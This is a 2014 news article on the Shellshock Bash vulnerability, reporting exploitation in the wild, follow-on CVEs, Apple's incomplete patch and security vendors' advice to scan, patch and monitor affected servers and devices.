Shellshock vulnerabilities exploited in the wild

News by Steve Gold

Linux: open source software is highly pervasive making the Shellshock vulnerability potentially more serious than Heartbleed.

Within a week of the Shellshock (aka Bash - CVE-2014-6271) vulnerability being discovered by researcher Stephane Chazelas, the first exploits have now been spotted in the wild.

As previously reported, Shellshock is a vulnerability that allows an attacker to perform remote code execution attacks on any server using the Bash shell.

Unfortunately, the use of this shell is widespread, as it is used in many server products, including those powering web sites. According to Carl Leonard, the regional head of Websense's EMEA research, malware found to be exploiting the Shellshock vulnerability has been dropped by various command-and-control servers previously known to Websense Security Labs.

"The malware has been seen to be downloaded to a compromised machine by exploiting the Shellshock vulnerability and invoking commands such as `curl' or `wget' and then executing the malicious payload. To date, we have seen four variants of the Linux backdoor and several versions of the Perl-based IRC bot," he says in his analysis of the problem.

Multiple vulnerabilities

Perhaps worse, Leonard and his team report that, since the initial disclosure of CVE-2014-6271, Websense has seen another five vulnerabilities identified in Bash. These have been assigned the identifiers of CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186 and CVE-2014-7187.

Experience, he says, has taught us that as cyber-criminals zoom in on the vulnerable code branch, additional vulnerabilities are likely to surface.  

"We strongly recommend that you monitor such issues and apply mitigation accordingly," he advises.

Fellow security vendor FireEye, meanwhile, says that it has discovered a real example of cybercriminals attempting to exploit the Bash remote code injection vulnerability against Network Attached Storage systems (NAS).

Apple patches incomplete

Just to make life interesting, although Apple has released a patch for Shellshock, Greg Wiseman, an engineering manager with Rapid7, claims that the patch only solves two of the three problems.

Wiseman is quoted by the CNET newswire as saying he ran a script to test for Bash/Shellshock vulnerabilities and found that even after installing Apple's patch on OS X Mountain Lion, the operating system was still susceptible to another vulnerability - CVE-2014-7186.

So how bad is the evolving situation?

Leeds-based security specialist RandomStorm says that it has warned customers to scan their Linux, Mac OS and Unix OS servers - and connected devices - for the problem.

Andrew Mason, Randomstorm's technical director, said that he and his team are advising all of their customers to run a scan for CVE-2014-6271 to check whether their Unix, and Linux servers and networked devices - such as cameras and alarms contain the Bash vulnerability.

As soon as a patch is released, we will update our xStorm service and we have emailed our customers to provide further guidance on updating their appliances," he said, adding that detailed information about this vulnerability can be found on Red Hat Bugzilla.

Lucas Zaichkowsky, enterprise defence architect with AccessData, said there are similarities between Shellshock and Heartbleed in that there are many software packages - including server software - that rely on commands and scripts and use the Bourne-again shell (Bash) by default.

"Companies should immediately scan everything exposed to the Internet for this vulnerability, then apply mitigating controls and available patches. After that, they should waste no time scanning internal systems for vulnerable software. 

"It's trivial for attackers to gain entry to an internal system at which point vulnerable internal systems could be exploited. They should also set up network intrusion detection systems to detect attacks and enable logging that would allow them to record exploitation. That will allow them to know if they've already been attacked," he explained.

Zaichkowsky went on to say that companies should also be aware of breaches happening to other organisations, as it is common for attackers to steal user passwords from one Web site, which they then use to gain entry into other businesses.

"The fact that this vulnerability has been around for so many years in such a common software package with source code open for anyone to review should act as a wake-up call to the fact that there are undiscovered, or even worse, undisclosed software vulnerabilities everywhere," he said.

"Attackers will always find ways to breach systems. Organisations must invest security resources into detecting and responding to attackers as they break into their network and snoop around," he added.

Joe Hancock, a cyber security specialist with Aegis, the Lloyds of London syndicate, said that Shellshock may be larger than Heartbleed in its scope,  owing to the fact it has effectively been around for 25 years, making it exceptionally pervasive.


"As well as Web servers and other applications, the Bash software is also used by many home broadband routers. The bug is relatively simple to use - attacks can simply copy a few lines of code freely available on the Internet," he said.

"Bugs in broadband routers have been previously used to attack over 300,000 routers found in small offices or homes and are likely to be used in this way again, most likely as part of a cyber-crime campaign. These attacks primarily took advantage of the router's default username and passwords to issue commands," he added.

Hancock went on to say that the devices most at risk are those that make up the Internet of Things or Industrial Control Systems.

"Any legacy device that uses a set of Web scripts to interact directly with the underlying Linux operating system via Bash could be potentially remotely monitored or controlled. For example a major control systems vendor's Programmable Logic Controllers use the Linux operating system, which has previously been shown to use the Bash software internally," he said.

"In some areas this will be a challenge to fix, as many embedded devices are not designed with regular updates in mind and will never be able to be patched," he added.

Find this article useful?

Get more great articles like this in your inbox every lunchtime

Video and interviews